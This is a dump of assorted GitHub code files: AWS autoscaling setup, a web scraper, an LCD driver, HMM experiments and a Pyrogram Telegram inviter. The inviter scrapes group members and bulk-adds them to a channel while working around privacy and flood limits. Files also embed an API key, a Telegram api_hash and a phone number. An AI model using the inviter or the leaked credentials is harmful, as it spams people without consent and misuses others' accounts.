self.head\n print(\" Head({}) ->\".format(temp.value), end=\"\")\n while(temp.next != None):\n temp = temp.next\n print(\" {} ->\".format(temp.value), end=\"\")\n \n def convert(self, arr):\n \"\"\"Converts an array into LinkedList\n\n Parameters\n ----------\n arr : list\n An array\n \"\"\"\n\n for a in arr:\n if self.head.value == None:\n self.head.value = a\n elif self.head.next == None:\n self.head.next = Node(a)\n else:\n temp = self.head\n while(temp.next != None):\n temp = temp.next\n temp.next = Node(a)\n\n def add(self, value):\n \"\"\"Adds value as a new Node into LinkedList\n\n Parameters\n ----------\n value : int\n Value to be added to LinkedList\n \"\"\"\n\n temp = self.head \n if(temp.value == None):\n self.head.value = value\n else:\n while(temp.next != None):\n temp = temp.next\n temp.next = Node(value)\n \n def remove(self, value):\n \"\"\"Removes Node with same value from LinkedList\n\n Parameters\n ----------\n value : int\n Value to be removed from LinkedList\n \"\"\"\n\n temp = self.head\n if(temp.value == value):\n self.head = temp.next\n else: \n while(temp.next.value != value):\n temp = temp.next\n rem_node = temp.next\n temp.next = temp.next.next\n rem_node.next = None\n \n\narr = [5, 6, 3, 3, 2, 1, 3, 21]\nll = LinkedList()\nll.convert(arr)\nll.add(56)\nll.remove(5)\nll.display()","repo_name":"bovem/algorithms-in-a-nutshell","sub_path":"python/linked_list.py","file_name":"linked_list.py","file_ext":"py","file_size_in_byte":3112,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"21668839681","text":"import sys\nimport boto3\nimport base64\n\ndef create_target_group(myvpcid, target_group_name, protocol, port):\n print('Creating Target group...')\n elbv2_c = boto3.client('elbv2')\n if protocol == 'TCP':\n protocol = 'HTTP'\n resp = elbv2_c.create_target_group(Name=target_group_name, Protocol=protocol, Port=port, VpcId=myvpcid, HealthCheckProtocol=protocol, HealthCheckPort=str(port), HealthCheckEnabled=True, HealthCheckIntervalSeconds=10, HealthCheckTimeoutSeconds=5, HealthyThresholdCount=5, UnhealthyThresholdCount=5, TargetType='instance')\n else:\n resp = elbv2_c.create_target_group(Name=target_group_name, Protocol='TCP', Port=port, VpcId=myvpcid, HealthCheckProtocol='TCP', HealthCheckPort='111', HealthCheckEnabled=True, HealthCheckIntervalSeconds=30, HealthCheckTimeoutSeconds=10, HealthyThresholdCount=10, UnhealthyThresholdCount=10, TargetType='instance')\n target_group_arn = resp['TargetGroups'][0]['TargetGroupArn']\n #print(target_group_arn)\n return target_group_arn\n\ndef create_load_balancer(subnet_id, lb_name, type):\n print('Creating Load balancer...')\n if type == 'net':\n elbv2_c = boto3.client('elbv2')\n resp = elbv2_c.create_load_balancer(Name=lb_name, Subnets=subnet_id, Tags=[{'Key': 'Name', 'Value': lb_name}], Type='network', IpAddressType='ipv4')\n lb_arn = resp['LoadBalancers'][0]['LoadBalancerArn']\n dnsname = resp['LoadBalancers'][0]['DNSName']\n print('Waiting for Load Balancer to be active')\n waiter = elbv2_c.get_waiter('load_balancer_available')\n waiter.wait(LoadBalancerArns=[lb_arn], WaiterConfig={'Delay': 60, 'MaxAttempts': 10})\n #waiter.wait(Names=[lb_name], Marker='active', PageSize=1)\n print('Load Balancer is active')\n if type == 'app':\n elbv2_c = boto3.client('elbv2')\n resp = elbv2_c.create_load_balancer(Name=lb_name, Subnets=subnet_id, Tags=[{'Key': 'Name', 'Value': lb_name}], Type='application', IpAddressType='ipv4')\n lb_arn = resp['LoadBalancers'][0]['LoadBalancerArn']\n dnsname = resp['LoadBalancers'][0]['DNSName']\n print('Waiting for Load Balancer to be active')\n waiter = elbv2_c.get_waiter('load_balancer_available')\n waiter.wait(LoadBalancerArns=[lb_arn], WaiterConfig={'Delay': 60, 'MaxAttempts': 10})\n #waiter.wait(Names=[lb_name], Marker='active', PageSize=1)\n print('Load Balancer is active')\n return lb_arn\n\ndef create_listener(lb_arn, target_group_arn, protocol, port):\n print('Creating Load balancer listener...')\n elbv2_c = boto3.client('elbv2')\n elbv2_c.create_listener(LoadBalancerArn=lb_arn, Protocol=protocol, Port=port, DefaultActions=[{'Type': 'forward', 'TargetGroupArn': target_group_arn, 'ForwardConfig': {'TargetGroups': [{'TargetGroupArn': target_group_arn}]}}])\n #create rule is only for listener\n #elbv2_c.create_rule\n\ndef create_autoscaling_group(subnet_id, target_group_arn, launch_template_id, group_name):\n print('Creating Autoscaling group...')\n as_c = boto3.client('autoscaling')\n #When use TargetGroupARNs, we don't need to use LoadBalancerNames=[lb_name].\n #When use launch template with subnet id, we don't need vpczoneidentifier\n resp = as_c.create_auto_scaling_group( \\\n AutoScalingGroupName=group_name, \\\n LaunchTemplate={'LaunchTemplateId': launch_template_id, 'Version': '$Latest'}, \\\n MinSize=2, \\\n MaxSize=4, \\\n #VPCZoneIdentifier=subnet_id, \\\n TargetGroupARNs=[target_group_arn], \\\n Tags=[\n {\n 'Key': 'Name',\n 'Value': group_name\n },\n ]\n )\n\ndef get_pub_subnets(myvpcid):\n subnets = []\n mysubnets = []\n mysubnets_tags = {}\n ec2_c = boto3.client('ec2')\n ec2_r = boto3.resource('ec2')\n myawsvpc = ec2_r.Vpc(myvpcid)\n for s in myawsvpc.subnets.all():\n mysubnets.append(s.id)\n resp = ec2_c.describe_subnets(SubnetIds=mysubnets)\n for s in resp['Subnets']:\n mysubnets_tags.update({s['SubnetId']: s['Tags']})\n for k, v in mysubnets_tags.items():\n if 'Pub' in v[0]['Value']:\n subnets.append(k)\n return subnets\n\ndef get_pri_subnets(myvpcid):\n subnets = []\n mysubnets = []\n mysubnets_tags = {}\n ec2_c = boto3.client('ec2')\n ec2_r = boto3.resource('ec2')\n myawsvpc = ec2_r.Vpc(myvpcid)\n for s in myawsvpc.subnets.all():\n mysubnets.append(s.id)\n resp = ec2_c.describe_subnets(SubnetIds=mysubnets)\n for s in resp['Subnets']:\n mysubnets_tags.update({s['SubnetId']: s['Tags']})\n for k, v in mysubnets_tags.items():\n if 'Pri' in v[0]['Value']:\n subnets.append(k)\n return subnets\n\ndef get_template_id (image_id, security_group_id, subnet_id, key_name, userdata):\n f = open(userdata, 'rb')\n base64string = base64.b64encode(f.read())\n base64string = base64string.decode('utf-8')\n ec2_c = boto3.client('ec2')\n resp = ec2_c.create_launch_template(\n LaunchTemplateData={\n 'ImageId': image_id,\n 'InstanceType': 't2.small',\n 'IamInstanceProfile': {\n 'Name': 'EC2BackEndProfile'\n },\n 'UserData': base64string,\n 'NetworkInterfaces': [\n {\n 'DeviceIndex': 0,\n 'Groups': [security_group_id],\n 'SubnetId': subnet_id\n }\n ],\n #'SecurityGroupIds': [security_group_id],\n 'KeyName': key_name,\n 'Monitoring': {'Enabled': True},\n 'TagSpecifications': [\n {\n 'ResourceType': 'instance',\n 'Tags': [\n {\n 'Key': 'Name',\n 'Value': 'CodeDeployHost',\n },\n ],\n },\n ],\n },\n LaunchTemplateName='CodeDeployHost',\n VersionDescription='codedeploy_v1',\n )\n launch_template_id = resp['LaunchTemplate']['LaunchTemplateId']\n #launch_template_name = resp['LaunchTemplate']['LaunchTemplateName']\n return launch_template_id\n\ndef main():\n myvpcid = sys.argv[1]\n subnet_id = []\n as_subnet_id = []\n image_id = 'ami-0fa49cc9dc8d62c84'\n #Creating gps part \n #target_group_arn = create_target_group(myvpcid, 'GpsAutoScalingTargetGroup', 'UDP', 10110)\n #Public subnet id\n #subnet_id = get_pub_subnets(myvpcid)\n #print(subnet_id) \n #lb_arn = create_load_balancer(subnet_id, 'GpsLoadBalancer', 'net')\n #create_listener(lb_arn, target_group_arn, 'TCP', 10110)\n ##Private launch template\n #launch_template_id = get_template_id('GPS')\n #print(launch_template_id)\n #as_subnet_id = get_pri_subnets(myvpcid)\n #print(as_subnet_id)\n #create_autoscaling_group(as_subnet_id, target_group_arn, launch_template_id, 'GpsAutoScalingGroup')\n\n ##Creating map part \n target_group_arn1 = create_target_group(myvpcid, 'CodeDeployTargetGroup1', 'TCP', 80)\n target_group_arn2 = create_target_group(myvpcid, 'CodeDeployTargetGroup2', 'TCP', 80)\n #Public subnet id\n subnet_id = get_pub_subnets(myvpcid)\n print(subnet_id) \n lb_arn = create_load_balancer(subnet_id, 'CodeDeployLoadBalancer', 'app')\n create_listener(lb_arn, target_group_arn1, 'HTTP', 80)\n create_listener(lb_arn, target_group_arn2, 'HTTP', 8080)\n\n #Private launch template\n as_subnet_id = get_pri_subnets(myvpcid)\n key_name = 'gregkey'\n userdata = 'nginxtest/userdata.txt'\n security_group_id = 'sg-0a0eade025d59923d'\n launch_template_id = get_template_id(image_id, security_group_id, as_subnet_id[0], key_name, userdata)\n print(launch_template_id)\n print(as_subnet_id)\n create_autoscaling_group(as_subnet_id, target_group_arn1, launch_template_id, 'CodeDeployHostAutoScalingGroup')\n \nif __name__ == '__main__':\n main()\n","repo_name":"gregsheu/aws","sub_path":"myaws_ec2_auto_scaling_host.py","file_name":"myaws_ec2_auto_scaling_host.py","file_ext":"py","file_size_in_byte":7943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"74053539450","text":"import json\nimport os\nimport urllib\nimport datetime\nimport ssl\n\nIMPORT_API_KEY = \"5a2844a10ccb47deabeaa0417c4f054a89cfae07a6b1dd6a8d5f7b4ce0741e65b28d43c0b0bd992894a60c35c777aaf1ebc51ccd02f2632031353c7f12646e5a6b521fd5862b428bcd1afed2be474fd2\"\nlimit = 5\n\n\nclass ioScraper:\n def __init__(self, name, site, api_id, region, category, db_collection, logo=\"\"):\n self.mix_index = 0\n self.name = name\n self.site = site\n self.api_id = api_id\n self.region = region\n self.category = category\n self.logo = logo\n self.db_collection = db_collection\n\n def get_name(self):\n return self.name\n\n def load_data(self):\n gcontext = ssl.SSLContext(ssl.PROTOCOL_TLSv1)\n results = json.load(\n urllib.urlopen(\"https://api.import.io/store/connector/\"+self.api_id+\"/_query?input=webpage/url:\"+self.site+\"_apikey=\"+IMPORT_API_KEY, context=gcontext)\n )\n \n return results\n\n def run(self):\n results = self.load_data()\n count = 0\n length = len(results['results'])\n while count < length:\n piece = results[\"results\"][count]\n source = piece[\"title\"]\n title = piece[\"title/_text\"].encode(\"utf-8\")\n if self.db_collection.find({\"source\": source}).count() != 0:\n return\n else:\n self.db_collection.insert({\n \"title\": piece[\"title/_text\"].encode(\"utf-8\"),\n \"source\": source,\n \"coverPic\": piece[\"coverpic\"],\n \"region\": self.region,\n \"section\": self.category,\n \"logo\": self.logo,\n \"popularity\": 0,\n \"mixIndex\": self.mix_index,\n \"dateAdded\": datetime.datetime.now()\n })\n self.mix_index = count % length\n count += 1\n","repo_name":"delkopiso/vendor-jobs","sub_path":"ioScraper.py","file_name":"ioScraper.py","file_ext":"py","file_size_in_byte":1913,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"7944629220","text":"# Find unit digit of a number\r\ndef unit_digit(n):\r\n digits = 1\r\n temp_n = n\r\n while n >= 10:\r\n n /= 10\r\n digits += 1\r\n n = temp_n\r\n while digits > 1:\r\n n -= n % (10 ** digits)\r\n digits -= 1\r\n return n\r\n\r\n\r\n# Check whether a number is prime\r\ndef check_if_prime(n):\r\n try:\r\n n = int(n)\r\n # n equals 2 or 3\r\n if n == 2 or n == 3:\r\n return True\r\n # n is divisible by two or three\r\n if n % 2 == 0 or n % 3 == 0:\r\n return False\r\n # n is odd\r\n else:\r\n i = 5\r\n while i ** 2 <= n:\r\n if n % i == 0 or n % (i + 2) == 0:\r\n return False\r\n i += 6\r\n return True\r\n except ValueError:\r\n return False\r\n\r\n\r\n# Check whether a number is prime generating\r\ndef check_if_prime_gen(n):\r\n count = 1\r\n while count <= int(n ** 0.5) + 1:\r\n if n % count == 0:\r\n if not check_if_prime(count + n // count):\r\n return False\r\n count += 1\r\n return True\r\n\r\n\r\ndef main():\r\n all_int = 2\r\n total_sum = 1\r\n while all_int <= 100000000:\r\n if check_if_prime_gen(all_int):\r\n total_sum += all_int\r\n all_int += 4\r\n print(total_sum)\r\n return\r\n\r\n\r\nmain()\r\n","repo_name":"eric-ycw/project-euler","sub_path":"euler357.py","file_name":"euler357.py","file_ext":"py","file_size_in_byte":1308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"7098556905","text":"from machine import I2C\nimport time\n\nclass Screen(object):\n LCD_CLEAR = 0x01\n LCD_CURSOR_MOVE = 0x14\n LCD_CURSOR_BLINKING = 0x0F\n LCD_CURSOR_OFF = 0x0C\n LCD_CURSOR_ON = 0x0E\n LCD_CURSOR_HOME = 0x02\n LCD_INIT_4BITS = 0x28\n LCD_ENTRY_MODE = 0x06\n LCD_CLEARDISPLAY = 0x01\n\n def __init__(self, i2c, address):\n self.i2c = i2c\n self.address = address\n buf = bytearray([0x00])\n self.i2c.writeto(self.address, buf) \n time.sleep_ms(50)\n\n self.lcd_write_raw(0x2, False, False, False)\n self.cmd(self.LCD_INIT_4BITS)\n self.cmd(self.LCD_INIT_4BITS)\n time.sleep_ms(10)\n self.cmd(self.LCD_CURSOR_BLINKING)\n time.sleep_ms(10)\n self.cmd(self.LCD_ENTRY_MODE)\n time.sleep_ms(10)\n self.cmd(self.LCD_CURSOR_HOME)\n time.sleep_ms(50)\n self.cmd(self.LCD_CURSOR_OFF)\n time.sleep_ms(50)\n self.cmd(self.LCD_CLEARDISPLAY)\n time.sleep_ms(50)\n \n \n def lcd_write_raw(self, data, rs, rw, light):\n data = (data << 4) & 0xF0\n if rw:\n data |= 0x02\n else:\n data &= 0xFC\n \n if light:\n data |= 0x08\n else:\n data &= 0xF7\n\n if rs: \n data |= 0x01\n else:\n data &= 0xFE\n\n data1 = data & 0xFB\n data2 = data | 0x04\n data3 = data & 0xFB\n buf = bytearray([data1, data2, data3])\n self.i2c.writeto(self.address, buf) \n\n\n def lcd_write(self, data, rs, rw, light):\n self.lcd_write_raw((data >> 4) & 0x0F, rs, rw, light)\n self.lcd_write_raw(data & 0x0F, rs, rw, light)\n \n def cmd(self, command):\n self.lcd_write(command, False, False, True)\n \n def write(self, char):\n self.lcd_write(char, True, False, True)\n \n def position(self, line, position):\n if line == 1:\n position += 0x40\n if line == 2:\n position += 0x14\n if line == 3:\n position += 0x54\n self.cmd(position)\n \n def write_line(self, text):\n for char in text:\n self.write(ord(char))\n \n","repo_name":"marekpiotrowskimp/rpi_pico","sub_path":"screen.py","file_name":"screen.py","file_ext":"py","file_size_in_byte":2195,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"15161850730","text":"import pyrogram\r\nfrom pyrogram import Client, idle, filters, types\r\nfrom pyrogram.handlers import MessageHandler\r\nfrom pyrogram.enums import ChatType\r\nfrom time import sleep\r\nfrom os import system\r\nimport sqlite3\r\nfrom tgbot.services.api_sqlite_advert import *\r\n\r\nids = []\r\nold_ids = []\r\nmy_apps = []\r\nusers = []\r\n#numbers = []\r\nsettings = {'tg_api_id':'26779608', 'tg_api_hash':'b6c80c800cab2010db3901820732e58f', 'channel_to_invite':'-1001683374540','parse_channel_ids': '@goodnewsrussia1', 'delay_msg': 60, 'count_users_send': 20,\"numbers\": \"+639674137467\", \"log\": 1}\r\n\r\ntry:\r\n with open('settings_inv.ini', 'rt', encoding='UTF8') as (f):\r\n file = f.readlines()\r\n for line in file:\r\n if '\\n' in line:\r\n line = line[:-1]\r\n line = line.split(' = ')\r\n settings[line[0]] = line[1]\r\n\r\nexcept:\r\n with open('settings.ini', 'wt', encoding='UTF8') as (f):\r\n for key in settings:\r\n f.write(f\"{key} = {settings[key]}\\n\")\r\n \r\n print(f'Fill in the settings.ini file!')\r\n system('pause')\r\n exit(-1)\r\n\r\n#vars\r\n#api_id = input(\">Enter api_id: \").split(', ')\r\n#api_hash = input(\">Enter api_hash: \").split(', ')\r\n#numbers = settings['phone']\r\napi_id = settings['tg_api_id']\r\napi_hash = settings['tg_api_hash']\r\n#numbers[0][0] = \"+63 967 413 7467\"\r\n#numbers[0][1] = \"26779608\"\r\n#numbers[0][2] = \"b6c80c800cab2010db3901820732e58f\"\r\nchannel_to_invite = settings['channel_to_invite']\r\nchannel_id = settings['parse_channel_ids'].split(', ')\r\ndelay_msg = float(settings['delay_msg'])\r\nnumbers = settings['numbers'].split(', ')\r\nlog = int(settings['log'])\r\ncount_users_send = int(settings['count_users_send'])\r\n#----TODO\r\nnumbers2 = get_all_tgaccounts_phones_to_invite()\r\nprint(numbers2)\r\n#groups_list = first_groupsavtoinvite()\r\n\r\nfor i in range(0, len(numbers2)):\r\n my_apps.append(Client(f\"pyr{i}\"))\r\n print(numbers2[i])\r\n \r\n with Client(f\"pyr{numbers2[i][0]}\", int(numbers2[i][1]), numbers2[i][2]) as my_apps[i]:\r\n #with Client(f\"app{numbers[i]}\", int(api_id[i]), api_hash[i]) as my_apps[i]:\r\n pass\r\n\r\ndef log_txt(m):\r\n if log == 1:\r\n print(m)\r\n\r\ndef get_online_members():\r\n with Client(f\"pyr{numbers[0]}\", api_id[0], api_hash[0]) as my_apps[0]:\r\n app1 = my_apps[0]\r\n for k in channel_id:\r\n log_txt('получаем участников...')\r\n members = app1.get_chat_members(k)\r\n for member in members:\r\n ids.append(member.user.id)\r\n print(member.user.id)\r\n #for i, my_app in enumerate(my_apps):\r\n # with Client(f\"app{numbers[i]}\", api_id[i], api_hash[i]) as my_apps[i]:\r\n # my_app[i].get_chat_members(k)\r\n\r\n\r\ndef get_offline_members(groupid):\r\n ids = first_idsgrouptoinvitebyid(groupid, start, count)\r\n\r\ndef inviter(app):\r\n old_s = ''\r\n s = ''\r\n count = 0\r\n for g in old_ids:\r\n try:\r\n ids.remove(g)\r\n except:\r\n pass\r\n while True:\r\n for dialog in app.get_dialogs():\r\n if dialog.chat.type == ChatType.GROUP or dialog.chat.type == ChatType.SUPERGROUP:\r\n for v in ids:\r\n s = v\r\n del ids[:1]\r\n \r\n if old_s != s:\r\n if count != count_users_send:\r\n try:\r\n app.add_chat_members(channel_to_invite, s)\r\n count += 1\r\n except pyrogram.errors.exceptions.forbidden_403.UserPrivacyRestricted:\r\n print(f'У пользователя: {s} ограничение! Продолжаем!')\r\n except pyrogram.errors.exceptions.bad_request_400.PeerFlood:\r\n print('У этого аккаунта лимит!')\r\n break\r\n else:\r\n print(f'Пользователи подошли к концу: {count_users_send}')\r\n count = 0\r\n break\r\n else:\r\n print('Все сделано!')\r\n break\r\n \r\n old_s = s\r\n\r\n log_txt(f\"left: {len(ids)}\")\r\n log_txt(f\"user_send: {s}\")\r\n sleep(delay_msg)\r\n else:\r\n continue\r\n break\r\n\r\n\r\nif __name__ == \"__main__\":\r\n get_online_members()\r\n for i in range(0, len(my_apps)):\r\n print(f'Аккаунтов всего: {len(my_apps)}')\r\n with Client(f\"pyr{numbers[i]}\", int(api_id[i]), api_hash[i]) as my_apps[i]:\r\n inviter(my_apps[i])","repo_name":"rashidovich2/TelegramGoodsInbot","sub_path":"inviter.py","file_name":"inviter.py","file_ext":"py","file_size_in_byte":4818,"program_lang":"python","lang":"en","doc_type":"code","stars":44,"dataset":"github-code","pt":"78"} +{"seq_id":"33178034401","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom hmmlearn import hmm\r\n\r\n## load data\r\nprint('Loading data...')\r\nall_gt = np.load('all_gt.npy')\r\nall_pred = np.load('Acc_65/all_pred_0.npy')\r\n\r\nnum_sims = 5\r\nnum_states = 12\r\nsave_diagonals = np.zeros((num_sims,num_states))\r\n\r\nfor qqq in range(0,num_sims):\r\n print('DOING SIMULATION ' + str(qqq+1) + ' OF ' + str(num_sims) + '.')\r\n ## define how to split data\r\n print(' Defining data splits...')\r\n ignore = 70 # to test how little data we need\r\n est_trans = 80\r\n est_conf = 0\r\n fit_params = 10\r\n re_order = np.random.permutation(len(all_gt))\r\n\r\n ## split data\r\n print(' Splitting data...')\r\n gt_est_trans = all_gt[re_order[ignore:est_trans]]\r\n gt_est_conf = all_gt[re_order[est_trans:est_trans+est_conf]]\r\n gt_fit = all_gt[re_order[est_trans+est_conf:est_trans+est_conf+fit_params]]\r\n gt_test = all_gt[re_order[est_trans+est_conf+fit_params:]]\r\n\r\n pred_est_trans = all_pred[re_order[ignore:est_trans]]\r\n pred_est_conf = all_pred[re_order[est_trans:est_trans+est_conf]]\r\n pred_fit = all_pred[re_order[est_trans+est_conf:est_trans+est_conf+fit_params]]\r\n pred_test = all_pred[re_order[est_trans+est_conf+fit_params:]]\r\n\r\n ## estimate init prob\r\n print(' Estimating start probabilities...')\r\n init_prob = np.ones(num_states)\r\n for case in all_gt[re_order[ignore:est_trans+fit_params]]:\r\n first_state = case[0]\r\n init_prob[first_state] += 1\r\n init_prob = init_prob/np.sum(init_prob)\r\n\r\n ## estimate transition matrix\r\n print(' Estimating transition probabilities...')\r\n trans_mat = np.ones((num_states,num_states))\r\n for case in all_gt[re_order[ignore:est_trans+fit_params]]:\r\n for i in range(1,len(case)):\r\n prev_state = case[i-1]\r\n curr_state = case[i]\r\n trans_mat[prev_state,curr_state] += 1\r\n for i,row in enumerate(trans_mat):\r\n trans_mat[i,:] = row/np.sum(row)\r\n\r\n ## estimate emission matrix\r\n print(' Estimating emission probabilities...')\r\n emiss_mat = np.ones((num_states, num_states))\r\n for i in range(0,len(gt_fit)):\r\n case = gt_fit[i]\r\n preds = pred_fit[i]\r\n for gt,pred in zip(case,preds):\r\n emiss_mat[gt,pred] += 1\r\n for i,row in enumerate(emiss_mat):\r\n emiss_mat[i,:] = row/np.sum(row)\r\n acc_oa = np.nanmean(np.diagonal(emiss_mat))\r\n\r\n ## define hmm model\r\n print(' Defining HMM model...')\r\n model = hmm.MultinomialHMM(n_components=num_states, n_iter=10,\r\n params='ste', init_params='')\r\n model.startprob_=init_prob\r\n model.transmat_=trans_mat\r\n model.emissionprob_=emiss_mat\r\n\r\n ## organize examples to fit model on\r\n print(' Organizing data to refine HMM parameters...')\r\n lengths = np.zeros((len(pred_fit),), dtype=int)\r\n all_x = np.array([pred_fit[0]]).T\r\n lengths[0] = len(pred_fit[0])\r\n for i in range(1,len(pred_fit)):\r\n this_x = np.array([pred_fit[i]]).T\r\n all_x = np.concatenate([all_x, this_x])\r\n lengths[i] = len(pred_fit[i])\r\n\r\n # fit model\r\n print(' Fitting HMM model...')\r\n model = model.fit(all_x, lengths)\r\n\r\n # decode test runs\r\n print(' Decoding test runs...')\r\n decode_test = []\r\n for case in pred_test:\r\n decode_state = model.decode(np.array([case]).T)\r\n decode_test.append(decode_state[1])\r\n\r\n # get confusion mat of decoded vals\r\n decoded_conf_mat = np.zeros((num_states,num_states))\r\n for case_gt,case_decode in zip(gt_test,decode_test):\r\n for gt,decode in zip(case_gt,case_decode):\r\n decoded_conf_mat[gt,decode] +=1\r\n for i,row in enumerate(decoded_conf_mat):\r\n decoded_conf_mat[i,:] = row/np.sum(row)\r\n\r\n save_diagonals[qqq,:] = np.diagonal(decoded_conf_mat)\r\n","repo_name":"MiningMyBusiness/HMMExperiments","sub_path":"LearnHMM.py","file_name":"LearnHMM.py","file_ext":"py","file_size_in_byte":3818,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"11455851182","text":"import math\nimport numpy as np\nfrom nndct_shared.base import NNDCT_OP\nfrom nndct_shared.utils import PatternType\nfrom nndct_shared.nndct_graph import GraphSearcher, Tensor\nfrom pytorch_nndct.parse.torch_op_def import TorchConvTranspose2d, TorchConv2d\nfrom .device import DeviceInfo, DeviceType\nfrom .target_helper import DPUTargetHelper\n\n# refer to xcomplier src/pass/passes/PartitionPass.cpp\ndef check_bilinear_upsample_fake_weight(node, scale_h, scale_w):\n msg = \"\"\n ic = node.in_tensors[0].shape[3]\n wsize = (2 * scale_h) * (2 * scale_w) * ic\n weights = [0.0] * wsize\n kernel_h = 2 * scale_h\n kernel_w = 2 * scale_w\n half_pixel_centers = node.node_attr(node.op.AttrName.HALF_PIXEL_CENTERS)\n if half_pixel_centers:\n h_s = math.ceil(scale_h * 0.5 - 0.5)\n w_s = math.ceil(scale_w * 0.5 - 0.5)\n delta = 0.5\n scale2pos = {2: 4, 4: 6}\n else:\n h_s = 0\n w_s = 0\n delta = 0.5\n scale2pos = {2: 2, 4: 4, 8: 6}\n \n for j in range(h_s, scale_h + h_s):\n for i in range(w_s, scale_w + w_s):\n lerp_x = (i + delta) / scale_w - delta\n lerp_x_f = lerp_x - math.floor(lerp_x)\n lerp_y = (j + delta) / scale_h - delta\n lerp_y_f = lerp_y - math.floor(lerp_y)\n right_idx = kernel_w - 1 - i + w_s\n left_idx = kernel_w - 1 - scale_w - i + w_s\n bottom_idx = kernel_h - 1 - j + h_s\n top_idx = kernel_h - 1 - scale_h - j + h_s\n for c in range(ic):\n weights[top_idx * kernel_w * ic + left_idx * ic + c] = (1 - lerp_x_f) * (1 - lerp_y_f)\n weights[top_idx * kernel_w * ic + right_idx * ic + c] = lerp_x_f * (1 - lerp_y_f)\n weights[bottom_idx * kernel_w * ic + left_idx * ic + c] = (1 - lerp_x_f) * lerp_y_f\n weights[bottom_idx * kernel_w * ic + right_idx * ic + c] = lerp_x_f * lerp_y_f\n \n bit_width = 8\n bound_low = 0\n bound_hight = 2 ** bit_width - 1 \n \n def is_within_bound(val):\n fix_val = val * (2 ** scale2pos[scale_h])\n return not(fix_val > bound_hight or fix_val < bound_low or (fix_val == 0 and val != 0))\n \n within_bound = all(map(is_within_bound, weights))\n if not within_bound:\n msg = \"weights fixed data out of range.\"\n return False, msg\n\n return True, msg\n\n \ndef check_bilinear_upsample_scale(node):\n msg = \"\"\n input_shape = node.in_tensors[0].shape\n output_shape = node.out_tensors[0].shape\n i_h = input_shape[1]\n i_w = input_shape[2]\n o_h = output_shape[1]\n o_w = output_shape[2]\n scale_f = [1.0, 1.0] # [scale_w, scale_h]\n scale = []\n scale_f[0] = float(o_w) / float(i_w)\n scale_f[1] = float(o_h) / float(i_h)\n half_pixel_centers = node.node_attr(node.op.AttrName.HALF_PIXEL_CENTERS)\n if half_pixel_centers:\n allowed_scale = [2, 4]\n else:\n allowed_scale = [2, 4, 8]\n \n for s_f in scale_f:\n if not (math.ceil(s_f) == s_f and math.floor(s_f) == s_f and\n any([s== s_f for s in allowed_scale])):\n msg = f\"{node.op.type} output / input scale is {scale_f}\"\n return False, msg\n \n scale.append(int(s_f))\n \n if not all([scale[0] == s for s in scale]):\n msg = \"scale_w is not equal with scale_h\" \n return False, msg\n \n ret, msg = check_bilinear_upsample_fake_weight(node, scale[1], scale[0])\n if not ret:\n return ret, msg\n \n node.set_node_attr(node.op.AttrName.SCALE, [float(scale[0]), float(scale[1])])\n return True, msg\n \ndef create_transpose_dwconv2d_from_bilinear_upsample(node):\n transpose_dwconv2d = TorchConvTranspose2d(NNDCT_OP.DEPTHWISE_CONVTRANSPOSE2D)\n scale_w, scale_h = node.node_attr(node.op.AttrName.SCALE)\n scale_w = int(scale_w)\n scale_h = int(scale_h)\n half_pixel_centers = node.node_attr(node.op.AttrName.HALF_PIXEL_CENTERS)\n input_shape = node.in_tensors[0].shape\n output_shape = node.out_tensors[0].shape\n kernel_h = 2 * scale_h\n kernel_w = 2 * scale_w\n transpose_dwconv2d.set_config('output_padding', [0, 0])\n transpose_dwconv2d.set_config('kernel_size', [kernel_h, kernel_w])\n transpose_dwconv2d.set_config('stride', [scale_h, scale_w])\n input_w = input_shape[2] + 2\n input_h = input_shape[1] + 2\n if half_pixel_centers:\n pad_l = int(math.floor(float(scale_w) / 2.0 - 0.5))\n pad_r = output_shape[2] + int(kernel_w) - 2 - (input_w - 1) * scale_w - pad_l\n pad_t = int(math.floor(float(scale_h) / 2.0 - 0.5))\n pad_b = output_shape[1] + int(kernel_h) - 2 - (input_h - 1) * scale_h - pad_t\n else:\n pad_l = scale_w - 1\n pad_r = scale_w - 1\n pad_t = scale_h - 1\n pad_b = scale_h - 1\n\n padding = [int(kernel_w) - 1 - pad_l, \n int(kernel_w) - 1 - pad_r,\n int(kernel_h) - 1 - pad_t, \n int(kernel_h) - 1 - pad_b]\n\n transpose_dwconv2d.set_attr(transpose_dwconv2d.AttrName.PAD_MODE, 0)\n transpose_dwconv2d.set_attr(transpose_dwconv2d.AttrName.PAD, padding)\n return transpose_dwconv2d\n\ndef check_nonlinear(engine, node):\n op_nonlinear_map = {\n NNDCT_OP.CONV2D: [NNDCT_OP.RELU, NNDCT_OP.RELU6, NNDCT_OP.PRELU, NNDCT_OP.LEAKY_RELU, NNDCT_OP.HSWISH, NNDCT_OP.HSIGMOID],\n NNDCT_OP.CONVTRANSPOSE2D: [NNDCT_OP.RELU, NNDCT_OP.RELU6, NNDCT_OP.PRELU, NNDCT_OP.LEAKY_RELU],\n NNDCT_OP.DEPTHWISE_CONV2D: [NNDCT_OP.RELU, NNDCT_OP.RELU6, NNDCT_OP.PRELU, NNDCT_OP.LEAKY_RELU],\n NNDCT_OP.DEPTHWISE_CONVTRANSPOSE2D: [],\n \n }\n msg = \"\"\n nonlinear_types = op_nonlinear_map.get(node.op.type)\n if nonlinear_types is None:\n nonlinear_types = []\n children_nodes = node.owning_graph.children(node)\n if len(children_nodes) == 1 and children_nodes[0].op.type in nonlinear_types:\n if children_nodes[0].op.type == NNDCT_OP.LEAKY_RELU:\n alpha = children_nodes[0].node_attr(children_nodes[0].op.AttrName.ALPHA)\n dpu_alpha = 26.0 / 256\n if alpha != dpu_alpha:\n msg = f\"Its alpa is {alpha}, but DPU only support {dpu_alpha}.\"\n return False, msg\n \n children_nodes[0].target_device = DeviceInfo(DeviceType.DPU)\n\n return True, msg\n\ndef check_kernel(kernels, kernel_limit):\n msg = \"\"\n if any([k not in kernel_limit for k in kernels]):\n msg = 